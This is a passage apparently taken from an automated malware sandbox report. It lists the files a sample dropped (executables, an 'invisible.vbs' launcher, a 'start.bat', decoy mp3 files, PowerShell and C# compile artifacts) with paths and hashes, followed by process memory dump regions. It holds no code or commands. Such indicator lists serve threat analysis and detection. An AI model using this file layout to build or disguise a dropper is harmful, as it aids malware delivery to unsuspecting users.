                                                                • SHA256 d28ef187840dcd1fe0a8a757ef9cd326023bec38b39ef1338f91d508d55dcf28
                                                                • MD5 SHA1 SHA512 TLSH

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 1KB
                                                                • SHA256 fa45d29e0f6becce98d48742b09a746026f85a50847ec1f78b112b34c6e1da34
                                                                • MD5 SHA1 SHA512 TLSH

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 64B
                                                                • SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
                                                                • MD5 SHA1 SHA512

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 1KB
                                                                • SHA256 76eff2ba9fea2df52068e454d55c465a4725c9cbd308ec4105fcb1fbe7ffae8e
                                                                • MD5 SHA1 SHA512 TLSH

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 1KB
                                                                • SHA256 e49642b0ff8c30532a8ca918cb0c2e03c5e2a10b16edb36efa76ea7ab4949b14
                                                                • MD5 SHA1 SHA512 TLSH

                                                                StartupProfileData-NonInteractive

                                                                • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                • Size 1KB
                                                                • SHA256 f1e5d82b5a189ea2be5bcb97eaf21b4ff8cb785bf14b9b7d0c3532a3cd068d60
                                                                • MD5 SHA1 SHA512 TLSH

                                                                RES3317.tmp

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RES3317.tmp
                                                                • Size 1KB
                                                                • SHA256 03efa9b006efb7f18b078569e60b234d30632259192044f81cdf10cf0f6930f1
                                                                • MD5 SHA1 SHA512 TLSH

                                                                application1.exe

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\application1.exe
                                                                • Size 3.4MB
                                                                • SHA256 9b7268be1064a8e5a1cfb1ab7a9fb50b35de39f90396cd32bdee079a5e512eb4
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                application2.exe

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\application2.exe
                                                                • Size 211KB
                                                                • SHA256 ba0534399906fc2733ef26d8ed51ac8d345af3987d2bdc696ee8c571845b07df
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                invisible.vbs

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\invisible.vbs
                                                                • Size 691B
                                                                • SHA256 4771ca45f9717dd274622292c4ec0a51ae2ae7cac2981a50957068bf3092f317
                                                                • MD5 SHA1 SHA512 TLSH

                                                                music1.mp3

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\music1.mp3
                                                                • Size 46KB
                                                                • SHA256 97f0609205e2a05b5387e65dbf9906335fc3d9ee54c7cff45e16d097e571696d
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                music2.mp3

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\music2.mp3
                                                                • Size 250KB
                                                                • SHA256 ee8183bd044835a580f4496ca260564e09a822790707db14c6eee644facfc46a
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                music3.mp3

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\music3.mp3
                                                                • Size 2.5MB
                                                                • SHA256 f40663445e5130f8b7a6a565dfd5f095ae35ba928b804148daf90dd2256fe91a
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                start.bat

                                                                • Path C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat
                                                                • Size 7KB
                                                                • SHA256 dbbbd654e73fc62fb8de3d8c2204ed95b96b0bac60266c75f376edc893cbb3af
                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                __PSScriptPolicyTest_1xxbmjsr.k51.ps1

                                                                • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xxbmjsr.k51.ps1
                                                                • Size 60B
                                                                • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                                • MD5 SHA1 SHA512 TLSH

                                                                minify.vbs

                                                                • Path C:\Users\Admin\AppData\Local\Temp\minify.vbs
                                                                • Size 74B
                                                                • SHA256 02d1b4d7a1a31496dbc17ea5bf3095c484479af051d7eb27804a1010f37ab333
                                                                • MD5 SHA1 SHA512 TLSH

                                                                yp5k0ib3.dll

                                                                • Path C:\Users\Admin\AppData\Local\Temp\yp5k0ib3\yp5k0ib3.dll
                                                                • Size 3KB
                                                                • SHA256 5a81901c4234e3e4c9db3e6fc367b4d22ebd7946dc5ecbdd0aec792665953fb3
                                                                • MD5 SHA1 SHA512 TLSH

                                                                CSCEA3D52B13D49418896E1C0135BFA896.TMP

                                                                • Path \??\c:\Users\Admin\AppData\Local\Temp\yp5k0ib3\CSCEA3D52B13D49418896E1C0135BFA896.TMP
                                                                • Size 652B
                                                                • SHA256 b56df8fcd7decde84ab983dccd0a77c7499dd29d7d0ae82f59150e260d9be8fc
                                                                • MD5 SHA1 SHA512 TLSH

                                                                yp5k0ib3.0.cs

                                                                • Path \??\c:\Users\Admin\AppData\Local\Temp\yp5k0ib3\yp5k0ib3.0.cs
                                                                • Size 273B
                                                                • SHA256 21e20751ecb0a52f75237a37f91c526c7bb4a584e426a0ebefe37cbe7acb3dc3
                                                                • MD5 SHA1 SHA512 TLSH

                                                                yp5k0ib3.cmdline

                                                                • Path \??\c:\Users\Admin\AppData\Local\Temp\yp5k0ib3\yp5k0ib3.cmdline
                                                                • Size 369B
                                                                • SHA256 333987f41fe99ae62f1eed98300ae2f6da8c23c69cf8c5b63fbb3508d604976b
                                                                • MD5 SHA1 SHA512 TLSH

                                                                memory/1456-99-0x00000167FB110000-0x00000167FB118000-memory.dmp

                                                                memory/2376-158-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-155-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-162-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-160-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-159-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-157-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2376-180-0x0000000000320000-0x0000000000F74000-memory.dmp

                                                                memory/2780-26-0x000001F313AD0000-0x000001F313AF2000-memory.dmp

                                                                memory/2780-33-0x000001F32BF70000-0x000001F32BF7A000-memory.dmp

                                                                memory/2780-32-0x000001F32BEB0000-0x000001F32BF62000-memory.dmp

                                                                memory/2780-31-0x000001F32BE90000-0x000001F32BEAE000-memory.dmp

                                                                memory/3080-64-0x000001EA05810000-0x000001EA0582E000-memory.dmp

                                                                memory/3080-66-0x000001EA05800000-0x000001EA0580A000-memory.dmp

                                                                memory/3080-65-0x000001EA057F0000-0x000001EA057FA000-memory.dmp

                                                                memory/3080-63-0x000001EA1DB10000-0x000001EA1DBC2000-memory.dmp

                                                                memory/3404-173-0x0000000004DA0000-0x0000000004E06000-memory.dmp

                                                                memory/3404-171-0x0000000004F00000-0x000000000554A000-memory.dmp

                                                                memory/3404-172-0x0000000004D00000-0x0000000004D22000-memory.dmp

                                                                memory/3404-174-0x0000000004E10000-0x0000000004E76000-memory.dmp

                                                                memory/3404-175-0x00000000055A0000-0x00000000058FB000-memory.dmp

                                                                memory/3404-179-0x0000000005B10000-0x0000000005B5C000-memory.dmp

                                                                memory/3404-178-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

                                                                memory/3404-166-0x0000000002280000-0x00000000022B6000-memory.dmp

                                                                memory/3512-78-0x000001EC75130000-0x000001EC751E2000-memory.dmp

                                                                memory/4400-156-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4400-83-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4400-148-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4400-125-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4400-124-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4400-123-0x00000000005B0000-0x0000000001204000-memory.dmp

                                                                memory/4696-116-0x00000000002F0000-0x000000000032C000-memory.dmp

                                                                memory/5052-170-0x00000000002B0000-0x0000000000F04000-memory.dmp

                                                                memory/5052-182-0x00000000002B0000-0x0000000000F04000-memory.dmp

                                                                memory/5396-40-0x000001EAA6420000-0x000001EAA64D2000-memory.dmp